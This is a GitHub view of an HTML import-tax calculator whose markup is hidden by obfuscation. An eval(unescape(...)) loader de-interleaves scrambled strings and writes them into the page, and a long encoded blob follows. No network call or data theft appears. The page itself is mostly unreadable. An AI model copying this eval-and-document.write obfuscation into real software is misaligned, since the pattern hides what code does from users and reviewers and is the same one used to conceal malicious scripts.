-
Notifications
You must be signed in to change notification settings - Fork 0
/
calculator.html
143 lines (143 loc) · 236 KB
/
calculator.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
<!DOCTYPE html>
<html lang="en">
<head>
<script>
eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%72%52%72%52%72%52%72%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b"));
</script>
<style>
form p:nth-child(1).texto,
form p:nth-child(2).texto {
display: none;
}
*.titulo-tabela {
color : windowtext;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 9pt;
font-style : normal;
font-weight : 700;
padding-left : 1px;
padding-right : 1px;
padding-top : 1px;
text-align : center;
vertical-align : middle
}
*.total-tabela {
color : windowtext;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 8pt;
font-style : normal;
font-weight : 700;
padding-left : 1px;
padding-right : 1px;
padding-top : 1px;
text-align : left;
vertical-align : middle
}
*.texto-tabela {
color : windowtext;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 8pt;
font-style : normal;
font-weight : 400;
padding-left : 1px;
padding-right : 1px;
padding-top : 1px;
text-align : left;
vertical-align : middle
}
*.texto {
color : windowtext;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 9pt;
font-style : normal;
font-weight : 400;
padding-left : 1px;
padding-right : 1px;
padding-top : 1px;
text-align : left;
vertical-align : middle
}
*.menu {
color : #FFF;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 9pt;
font-style : normal;
font-weight : 400;
padding-left : 1px;
padding-right : 1px;
padding-top : 1px;
text-align : left
}
*.box-valores {
color : windowtext;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 8pt;
font-style : normal;
font-weight : normal;
text-align : right;
vertical-align : middle;
background-color: #E5E5E5;
}
*.box-final {
color : windowtext;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 8pt;
font-style : normal;
font-weight : bolder;
text-align : right;
vertical-align : middle;
background-color: #999999;
}
*.box-resultado {
color : windowtext;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 8pt;
font-style : normal;
font-weight : 400;
text-align : right;
vertical-align : middle
}
*.box-resultado-italico {
color : #999;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 7.5pt;
font-style : italic;
font-weight : 300;
text-align : right;
vertical-align : middle
}
*.texto-direita {
color : windowtext;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 8pt;
font-style : normal;
font-weight : 400;
padding-left : 1px;
padding-right : 1px;
padding-top : 1px;
text-align : right;
vertical-align : middle
}
*.box-total {
color : windowtext;
font-family : "Trebuchet MS",Tahoma,Arial,Helvetica,sans-serif;
font-size : 8pt;
font-style : normal;
font-weight : bold;
text-align : right;
vertical-align : middle
}
.menu-topo {
color: #FFF;
font-size: 9px;
font-weight: bold;
font-family: Arial, Helvetica, sans-serif;
vertical-align: middle;
}
</style>
</head>
<body onload="LoadFromQueryString();recalc_onclick('');" onunload='' browserstorage="false">
<script>RrRrRrRr("<-ecytei->\n\nfr d\"om\"nm=frc ehd\"ot>\npcas\"et\"A<togOa otact;i<srn>dsoiiiaaax m ermnaqepsiiiauasml&cdl&tleosmlfcd o rniastiuo ao ea mrsse aargm rbtact;i lcora,lcopeuioesmlsncoa)<p\r< ls=txo>nom biooftrmnoauld u mrs eaod o aueadsvna,a epssicria uat n sa&aueqoa o rniastiuo pseomuesbea ihspr aoe nom&cdl&tlee)<r\r<nu ye\"idn d\"urnpnl >\nipttp=hde\"i=pnld\"/\r<nu d'LW224 ye'idn edny'edny au=0 ae'LW224 aidx'1 >\nipti=XE___'tp=hde'raol=raol'vle''nm=XE___'tbne=-'/\r<nu d'LW244 ye'idn edny'edny au=0 ae'LW244 aidx'1 >\nipti=XE___'tp=hde'raol=raol'vle''nm=XE___'tbne=-'/\r<nu d'LW264 ye'idn edny'edny au=0 ae'LW264 aidx'1 >\nb>/>\ndvsye\"ipa:oe>\nipttp=hde\"i=x_pedhe\"nm=x_pedhe\"vle\"iuao\"/\r<nu ye\"idn d\"lcin\"nm=x_let au=h..\"/\r<r<dv\r tbebre=0 elpcn=4 eladn=0 lg=cne\"\r t ls=ttl-eu>\n<dbclr\"FFF\"cas\"iuotbl\"Vna<t>\n<dcas\"iuotbl\"Ttld n<t>\n<dwdh\"0>/d\r t goo=#FFF ls=ttl-aea>epss/d\r t ls=ttl-aea>oa oAo/d\r t it=3\"<t>\n<dcas\"iuotbl\"Tiuo<t>\n<dcas\"iuotbl\"A&aueqoa/d\r /r\r t>\n<dbclr\"FFF\"cas'et-otuosal>pcas\"et-aea nosOe=Tp'nom eet na o eed emraois' ALO,tu,AOE re FST,-7 ADN,8\"oMueu=UTp)>o&aueri<t>\n<dcas\"e0\"<pncas\"o-eutd\"\r ipti=XE___'tp=tx'vle' ls=bxvlrs tl=wdh10'ocag=ti.au=eipaFotDheprelaT(hsvle,)rcl_nlc(XE___'\"nm=XE___'paeodr' aidx''dt-he=2 aarw''dt-o=3/\r /pn<t>\n<d<t>\n<dbclr\"FFF\"cas'et-otuosal>pcas\"et-aea nosOe=Tp'nom eps na o oh epgmnobua usj,smo nagstaahsa.,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"Slact;is/d\r t ls=txotbl\"<pncas\"o-eutd\"\r ipti=XE___'tp=tx'vle' ls=bxvlrs tl=wdh10'ocag=ti.au=eipaFotDheprelaT(hsvle,)rcl_nlc(XE___'\"nm=XE___'paeodr' aidx''dt-he=2 aarw''dt-o=8/\r /pn<t>\n<dcas\"et-aea>/d\r t ls=txotbl\"< ls=txotbl\"oMuevr\"i(Cs u mrs eaidsra,ifreaa&aueqoad P pi&auevl&gae u mrs.,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"II/d\r t ls=txotbl\"<pncas\"o-eutd\"\r ipti=XE___1 ye'et au=1,0'cas'o-aoe'sye'it:0% nhne\"hsvleedslyecnN(easPretti.au)2;eacocik'LW221'\"nm=XE___1 lchle='tbne=1'dt-he=2 aarw''dt-o=1'>\n<sa>/d\r /r\r t>\n<dbclr\"FFF\"cas'et-otuosal>pcas\"et-aea nosOe=Tp'nom eet na o ed epouo.,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"Iduct;ti<t>\n<dcas\"e0\"<pncas\"o-eutd\"\r ipti=XE___'tp=tx'vle' ls=bxvlrs tl=wdh10'ocag=ti.au=eipaFotDheprelaT(hsvle,)rcl_nlc(XE___'\"nm=XE___'paeodr' aidx''dt-he=2 aarw''dt-o=3/\r /pn<t>\n<d<t>\n<dbclr\"FFF\"cas'et-otuosal>pcas\"et-aea nosOe=Tp'nom ao na a opa eismsuiiao apoucei;aid; /umraoispr eed.,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"Cmrs<t>\n<dcas\"o-eutd\"<nu d'LW238 ye'et au='cas'o-aoe'sye'it:0% nhne\"hsvleedslylaNT(easFothti.au)0;eacocik'LW238) ae'LW238 lchle='tbne=7 aaset''dt-o=3 aacl''>/d\r t ls=bxrslao>ns;/d\r t ls=bxrslao>pcas\"et-aea nosOe=Tp'aosaepeasj rsaoad ev&cdlo,ifreaa&aueqoad S pi&auevl&gae u mrs.,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"IS/d\r t ls=bxrslao>ipti=XE___1 ye'et au=50% ls=bxvlrs tl=wdh10'ocag=ti.au=eipaPretDepreecn(hsvle,)rcl_nlc(XE___1) ae'LW231'paeodr' aidx'2 aaset''dt-o=3 aacl'1/<t>\n<t>\n<r\r t goo=#FFF ls=txocned-ml'< ls=txotbl\"oMuevr\"i(Ifrearciaaulcmpet&cdl&tleod ev&cdlo rbtdsn nx I oSmlsNcoa.,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"Sricei;s\n-AeoII/d\r t ls=e19>sa ls=bxrslao>\n<nu d'LW243 ye'et au='cas'o-aoe'sye'it:0% nhne\"hsvleedslylaNT(easFothti.au)0;eacocik'LW243) ae'LW243 lchle='tbne=3 aaset''dt-o=4 aacl''>\n<sa>/d\r t>/d\r t goo=#FFF ls=txocned-ml'< ls=txotbl\"oMuevr\"i(Ifreadseaaulcmeegae&auetia lges rtsecreo ao urspsosjrict;ia.,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"EegaAuulFee<t>\n<dcas\"o-eutd\"<nu d'LW248 ye'et au='cas'o-aoe'sye'it:0% nhne\"hsvleedslylaNT(easFothti.au)0;eacocik'LW248) ae'LW248 lchle='tbne=8 aaset''dt-o=4 aacl''>/d\r t ls=bxrslao>ns;/d\r t ls=bxrslao>pcas\"et-aea nosOe=Tp'aosaepeasj oeca /uidsra,ifreaa&aueqoad CSalcact;e arv;saepea' ALO,tu,AOE re FST,-7 ADN,8\"oMueu=UTp)>CS/d\r t ls=bxrslao>ipti=XE___1 ye'et au=1,0'cas'o-aoe'sye'it:0% nhne\"hsvleedslyecnN(easPretti.au)2;eacocik'LW241'\"nm=XE___1 lchle='tbne=1'dt-he=2 aarw''dt-o=1'>/d\r /r\r t>\n<dbclr\"FFF\"cas'et-otuosal>pcas\"et-aea nosOe=Tp'nom eet na o rsacei;aid; esricei;stiuao oAeoI oSmlsNcoa.,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"Sricei;s\n-AeoI /d\r t ls=e19>sa ls=bxrslao>\n<nu d'LW253 ye'et au='cas'o-aoe'sye'it:0% nhne\"hsvleedslylaNT(easFothti.au)0;eacocik'LW253) ae'LW253 lchle='tbne=4 aaset''dt-o=5 aacl''>\n<sa>/d\r t>/d\r t goo=#FFF ls=txocned-ml'< ls=txotbl\"oMuevr\"i(Ifreadseaaulcmdpei&cdl&tleod esd tv mblzd.Cs &tleosiaovlreao nom ao e2%d oa eaio mblzdsd mrs.,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"Dpei&cdl&tleo<t>\n<dcas\"o-eutd\"<nu d'LW258 ye'et au='cas'o-aoe'sye'it:0% nhne\"hsvleedslylaNT(easFothti.au)0;eacocik'LW258) ae'LW258 lchle='tbne=9 aaset''dt-o=5 aacl''>/d\r t ls=bxrslao>ns;/d\r t ls=bxrslao>pcas\"et-aea nosOe=Tp'nom lict;ut eRTalcact;e arv;saepea<r<r&82;1 aaepea o ax ic eaiet etaah;b>#26 %pr mrsscmmect;i ic eaiet etaah;o b>#26 %pr mrsscmat ic eaiet etaah ,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"RT/d\r t ls=bxrslao>ipti=XE___1 ye'et au=10% ls=bxvlrs tl=wdh10'ocag=ti.au=eipaPretDepreecn(hsvle,)rcl_nlc(XE___1) ae'LW251'paeodr' aidx'4 aaset''dt-o=5 aacl'1/<t>\n<t>\n<r\r t goo=#FFF ls=txocned-ml'< ls=txotbl\"oMuevr\"i(Ifrearciaaulcmpet&cdl&tleod ev&cdlo rbtdsn nx oSmlsNcoa.,BLON re BV,tu,OFEX 1,PDIG ) nosOt\"ni(\"Sricei;s-AeoV<t>\n<dcas\"e0\"<pncas\"o-eutd\"\r ipti=XE___'tp=tx'vle' ls=bxvlrs tl=wdh10'ocag=ti.au=eipaFotDheprelaT(hsvle,)rcl_nlc(XE___'\"nm=XE___'paeodr' aidx''dt-he=2 aarw''dt-o=3/\r /pn<t>\n<d<t>\n<dbclr\"FFF\"cas'et-otuosal>pcas\"et-aea nosOe=Tp'nom ao na etdsa easdsea nordsn pr&cdl&tleod mrs ECT RBTS,cm o xml:&auega eeoe euo,vglaicni,mtraspr srtoct;i,lmea ev&cdlo oao,dseacmifr&auetc,ec<r<rNaid; nom ao o eune rbts I/AE,CFN,IP,CL,II S,IM,SmlsNcoa,IS GS' ALO,tu,AOE re FST,-7 ADN,8\"oMueu=UTp)>easDsea<t>\n<dcas\"o-eutd\"<nu d'LW268 ye'et au='cas'o-aoe'sye'it:0% nhne\"hsvleedslylaNT(easFothti.au)0;eacocik'LW268) ae'LW268 lchle='tbne=1'dt-he=2 aarw''dt-o=8/\r<t>\n<dcas\"o-eutd\"&bp<t>\n<dcas\"o-eutd\"&bp<t>\n<dcas\"o-eutd\"&bp<t>\n<r\r t goo=#FFF ls=ttltbl'TtldsVna<t>\n<dcas\"e2\"<pncas\"e2\"\r ipti=XE___'tp=tx'raol=raol'vle''cas'o-oa'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW273 aidx'1 >\n<sa>/d\r t>/d\r t goo=#FFF ls=ttltbl'TtldsDsea /d\r t>sa ls=e13>\n<nu d'LW278 ye'et edny'edny au=0 ls=bxttl tl=oefo:idn odr0xsld#000 it:0%'nm=XE___'tbne=-'/\r /pn<t>\n<d&bp<t>\n<d&bp<t>\n<d&bp<t>\n<t>\n<tbe\r<>h ohd ie\"\"\r p<pncas\"et\" eaasgi ag rbtact;i mcd oaiaed rbt&cdl&tleo<sa>b>\n/>\n<al eladn=0 elpcn=0 goo=#FFF lg=cne\"\r t tl=hih:6t>\n<drwpn\"\"cas'iuotbl'Tiuo<t>\n<dhih=2\"clpn\"\"bclr\"DDD\"cas'iuotbl'LcoPeuio/d\r t egt\"5 ls=ttl-aea>ns;/d\r t egt\"5 osa=2 goo=#DDD ls=ttl-aea>ur el/d\r t egt\"5 ls=ttl-aea>ns;/d\r t egt\"5 osa=2 goo=#DDD ls=ttl-aea>ipe ainl/d\r /r\r t tl=hih:6t>\n<dcas'iuotbl'A&aueqoa/d\r t ls=ttl-aea>ao<t>\n<dcas'iuotbl'<t>\n<dcas'iuotbl'A&aueqoa/d\r t ls=ttl-aea>ao<t>\n<dcas'iuotbl'<t>\n<dcas'iuotbl'A&aueqoa/d\r t ls=ttl-aea>ao<t>\n<t>\n<rsye'egt1p'\r t ls=txotbl\"PS/d\r t ls=bxrslaoiaio>,5<t>\n<dcas'o-eutd'<pn\r ipti=XE__23 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__23 aidx'1 >\n\t\t\t/d\r /pn<t>\n<dcas'et-iet'&bp<t>\n<dcas'o-eutd-tlc'16%/d\r t>ipti=XE__25 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__25 aidx'1 >/d\r t>ns;/d\r t>ns;/d\r t>ns;/d\r /r\r t tl=hih:6t>\n<dcas\"et-aea>OIS/d\r t ls=bxrslaoiaio>,0<t>\n<dcas'o-eutd'<pn\r ipti=XE__33 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__33 aidx'1 >\n<sa>/d\r t ls=txodria>ns;/d\r t ls=bxrslaoiaio>,0<t>\n<d<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW21_'tbne=-'/<t>\n<d&bp<t>\n<d&bp<t>\n<d&bp<t>\n<t>\n<rsye'egt1p'\r t ls=txotbl\"IP<t>\n<dcas'o-eutd-tlc'1,0<t>\n<dcas'o-eutd'<pn\r ipti=XE__43 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__43 aidx'1 >\n<sa>/d\r t ls=txodria>ns;/d\r t ls=bxrslaoiaio>50%/d\r t>ipti=XE__45 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__45 aidx'1 >/d\r t>ns;/d\r t>ns;/d\r t>ns;/d\r /r\r t tl=hih:6t>\n<dcas\"et-aea>SL/d\r t ls=bxrslaoiaio>,0<t>\n<dcas'o-eutd'<pn\r ipti=XE__53 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__53 aidx'1 >\n<sa>/d\r t ls=txodria>ns;/d\r t ls=bxrslaoiaio>,0<t>\n<d<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW21_'tbne=-'/<t>\n<d&bp<t>\n<d&bp<t>\n<d&bp<t>\n<t>\n<rsye'egt1p'\r t ls=txotbl\"II/d\r t ls=bxrslao>sa>\n<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh7p ae'LW21_'tbne=-'/\r /pn<t>\n<dcas'o-eutd'<pn\r ipti=XE__63 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__63 aidx'1 >\n<sa>/d\r t>/d\r t ls=bxrslao>sa>\n<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh7p ae'LW21_'tbne=-'/\r /pn<t>\n<d<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW21_'tbne=-'/<t>\n<d<t>\n<d<t>\n<d<t>\n<t>\n<rsye'egt1p'\r t ls=txotbl\"IS/d\r t ls=bxrslao>sa>\n<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh7p ae'LW21_'tbne=-'/\r /pn<t>\n<dcas'o-eutd'<pn\r ipti=XE__73 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__73 aidx'1 >\n<sa>/d\r t>/d\r t ls=bxrslao>sa>\n<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh7p ae'LW21_'tbne=-'/\r /pn<t>\n<dcas'o-eutd'<pn\r ipti=XE__75 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__75 aidx'1 >\n\t\t\t/d\r /pn<t>\n<d<t>\n<d<t>\n<d<t>\n<t>\n<rsye'egt1p'\r t ls=txotbl\"IM<t>\n<dcas'o-eutd'<pn\r ipti=XE__82 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0x'nm=XE__82 aidx'1 >\n<sa>/d\r t ls=bxrslao>sa>\n<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW21_'tbne=-'/\r /pn<t>\n<d<t>\n<dcas'o-eutd'<pn\r ipti=XE__84 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0x'nm=XE__84 aidx'1 >\n<sa>/d\r t ls=bxrslao>sa>\n<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW21_'tbne=-'/\r /pn<t>\n<d<t>\n<d<t>\n<d<t>\n<t>\n<rsye'egt1p'\r t ls=txotbl\"SmlsNcoa<t>\n<d<t>\n<d<t>\n<d<t>\n<d<t>\n<d<t>\n<d<t>\n<d<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh7p ae'LW21_'tbne=-'/<t>\n<d<nu d'LW21_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW21_'tbne=-'/<t>\n<t>\n<rsye'egt1p'\r t ls=txotbl\"IS arnl/d\r t ls=bxrslaoiaio>00%/d\r t ls=bxrslao>sa>\n<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh ae'LW22_'tbne=-'/\r /pn<t>\n<dcas'et-iet'<t>\n<dcas'o-eutd-tlc'2,0<t>\n<d<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW22_'tbne=-'/\r<t>\n<d<t>\n<d<pncas\"et-aea>\n<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh7p ae'LW22_'tbne=-'>/pn<t>\n<d<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW22_'tbne=-'/<t>\n<t>\n<rsye'egt1p'\r t ls=txotbl\"IS ecio<t>\n<dcas'o-eutd-tlc'58%/d\r t ls=bxrslao>sa>\n<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW22_'tbne=-'/\r /pn<t>\n<dcas'et-iet'<t>\n<dcas'o-eutd-tlc'58%/d\r t>ipti=XE__15 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__15 aidx'1 >/d\r t>/d\r t>/d\r t>/d\r /r\r t tl=hih:6t>\n<dcas\"et-aea>NSRT/d\r t ls=bxrslao>sa>\n<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh7p ae'LW22_'tbne=-'/\r /pn<t>\n<dcas'o-eutd'<pn\r ipti=XE__23 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__23 aidx'1 >\n<sa>/d\r t>/d\r t ls=bxrslao>sa>\n<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh7p ae'LW22_'tbne=-'/\r /pn<t>\n<d\r ipti=XE__25 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__25 aidx'1 >/d\r t>/d\r t>\n<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh7p ae'LW22_'tbne=-'/<t>\n<d\r ipti=XE__27 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__27 aidx'1 >/d\r /r\r t tl=hih:6t>\n<dcas\"et-aea>GS/d\r t ls=bxrslaoiaio>,0&bp<t>\n<dcas'o-eutd'<pn\r ipti=XE__33 ye'et edny'edny au=0 ls=bxrslaoiaio tl=oefo:idn odr0xsld#000 it:0%'nm=XE__33 aidx'1 >\n<sa>/d\r t ls=txodria>/d\r t ls=bxrslaoiaio>,0&bp<t>\n<d<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW22_'tbne=-'/\r<t>\n<d<t>\n<dcas'o-eutd-tlc'80%ns;/d\r t ls=bxrslao>sa>\n<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-eutd-tlc'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW22_'tbne=-'/<sa>/d\r /r\r t tl=hih:8t>\n<dhih=2\"vlg=mdl\"bclr\"999\"cas'oa-aea>oa eIpso<t>\n<dvlg=mdl\"bclr\"999\"<t>\n<dvlg=mdl\"bclr\"999\"<pncas\"e3\"\r ipti=XE__43 ye'et edny'edny au=0 ls=bxfnl tl=oefo:idn odr0xsld#000 it:0%'nm=XE__43 aidx'1 >\n<sa>/d\r t ain\"ide goo=#999>/d\r t ain\"ide goo=#999>/d\r t ain\"ide goo=#999>sa ls=bxfnl>\n<nu d'LW22_'tp=tx'raol=raol'vle''cas'o-ia'sye'vrlwhde;bre:p oi 000;wdh10 ae'LW22_'tbne=-'/\r /pn<t>\n<dvlg=mdl\"bclr\"999\"<t>\n<dvlg=mdl\"bclr\"999\"<t>\n<dvlg=mdl\"bclr\"999\"<pncas\"o-ia\"\r ipti=XE__47 ye'et edny'edny au=0 ls=bxfnl tl=oefo:idn odr0xsld#000 it:0%'nm=XE__47 aidx'1 >\n<sa>/d\r /r\r /al>\nb>\n<pncas\"et-otuo>\n<etr\r ipttp=bto\"vle\"ipr ae\"lrsttp\"oCik\"ee_nlc('\"cas\"et-otuo>\n<nu ae\"lpittp\"tp=bto\"cas\"et-otuo nlc=wno.rn(; au=Ipii\"\r /etr\r /i>\n<citlnug=jvsrp\"tp=tx/aacit>\nfnto ee_nlc()dcmn.om.ee(;otoe)rcl_nlc(';;ucinpscd({;ucineqeytig)vrqeytigdcmn.oainsac;fqeytiglnt>)vrals(ursrn.usrn().pi(&)vrvral;a e;a au;o(a i0i<aibe.eghi+)vral=aibe[i.pi(=)kyuecp(aibe0)vleuecp(aibe1)i(ouetfrcky!nl)dcmn.om[e]vlevle}}fnto nta_pae)pscd(';eursrn(;eacocik')}\n<srp>\n\r\r\r<nu ye\"idn d\"ltmltiae\"nm=x_epaemgs au=1>ipttp=hde\"i=x_u2 ae\"lax\"vle\"EDCAAIFFlfPS/////yBA2tWhGyGlFyW1GHmgjfGtGhGcmsGk3hinWBBAQAAAA3QAAAKT2URcYKwWm0YrbRgWSsosWnlBLehQOiAXIgklIiQkUwTz8F79ZdfuvFTXtBz\rFDDg624I/NPD0vCcsUbLb3azULI7o63Ts7sdy7K7S4bpGmB5YG3ERuetaheVeAWzTzhutEvg5tRnU6sSNqFdmhL5gYMAI9y4sEubYVRHSmgxAJZKdA50E2yKSmTlQyz1\nmC1SziQ8lxTYslCTaleUl3EQhT0/IQap63UMoPxbqw9vBSEw9rRCRqtAG0TtC0D4ReT82YbbPkYuGUfv0LnX1ev33kfr1rX5L5/vgaJ2b0P3x/WG1vktH1Xj+T2G2tz\rxj9b+/78/Jbzwdn8+5/PEDCAAIFFlHBk/////HBA2tWhGyGlFyW1GHmgjfGtGhGc2tWhGyGlFyW1GHmgjuGtGhGBBAnAAAAAwAAAOdXih+s0V2tdHAAkhSsmHz6MQolU\np0xm4duLB9I6pN5NGQcZcEj+H+yh3+r0elfpQf6PeN+1kmOtiI9pOXNiIuIiOWNuifIA6uSw1OwKTxNol3zyHx6MKD0MPyduwOkbA0GiutqLUVETKJjRkERziLJBzco\rpSNUQorjlTrgbumNXaCkrG/qfxVFoJ22GFeLLZgJKoiL6St9OoEA+ncdC0kydAYI/vpv4hDakGCnpQBWnAXZAJOvJ0T+C0Tq159ipikCDCkJwCNSKDwM6Yhk8JfKNJqz\nylVSduIJ5cFLni6TRULmWNlTYL1RCOSpXVW0TZUded7VIqPyuc8CdhHRsCZpQE3MqoJYcG9yD2tpSIPGQJMt4TdT8Dcofwz761D5thY6iq0OppJllqS5KGq/p0Sltwh\riHc/6LLHSn0osm7s5pF0T3MZKGbPAT1MPDnbJVfDM55Rdl2TAOkcbTfBcnkvwPmr2IJc8De9oebeR8OX4sXQ4WUSJAXExL3YOB/256qhZ4euaj4aIJBPGsgIGs797TdZ\n4C2d/eHVKydCtq3TYPp4GVcESzZiOMbIKTKwJxFXvxkQ7beEGWZ8tLKf43K2GyLNpArBG9GQ6ha/sw2WCQCN1yev8N9OM3zRZbwWJU/fye0wfTpmdkXSWJVFpfkZToF\rr4L+vZpbj2BxnnRiLLrp+lyr3bBEZGvT0NdRoaGqhuD4K4oiQJTnFiDuUjooFmw0xjpKP/ZzTzaRcTLPxaiWPiGmXZ7S5eCvgktU0cyASeWwatJ+1zy5JAOwguwrBfyg\n1xWKRwh7QtxDYEDbQbwXjqbjv1jdx36CI0bFaiL3kZg2UiKG2R+zCyZNHuTACxU0iZPClX/zTsBI0W13oWEsJ7Rn1Zb6POdrC8Kh4PIN4An1iNrst5nYRsXrdu4wcrP\r5GPaOi9t1ftlJf7l2jnFYoLYnrVOE5KyY85yA/8YOHJNAbusXetArsTzmjfZkl814Vm35fuCnAbvMwg0zyRf8XlbrJUkyovoOWDOwQ/a+WjCAi9cmjhaWtWJXDDKYcil\nQFYoYoNMbFGnkopQTIHW2u5MSy0m+O+4oZaNrr4fpWZkmmuMdy3x2257+nznCxIQzENxkOIeglLbeJIzSpaHfvysIx/7A6yU+5486QxUnQNGyE5iNXEFuoOcQxIVjqE\rLAdCzT0+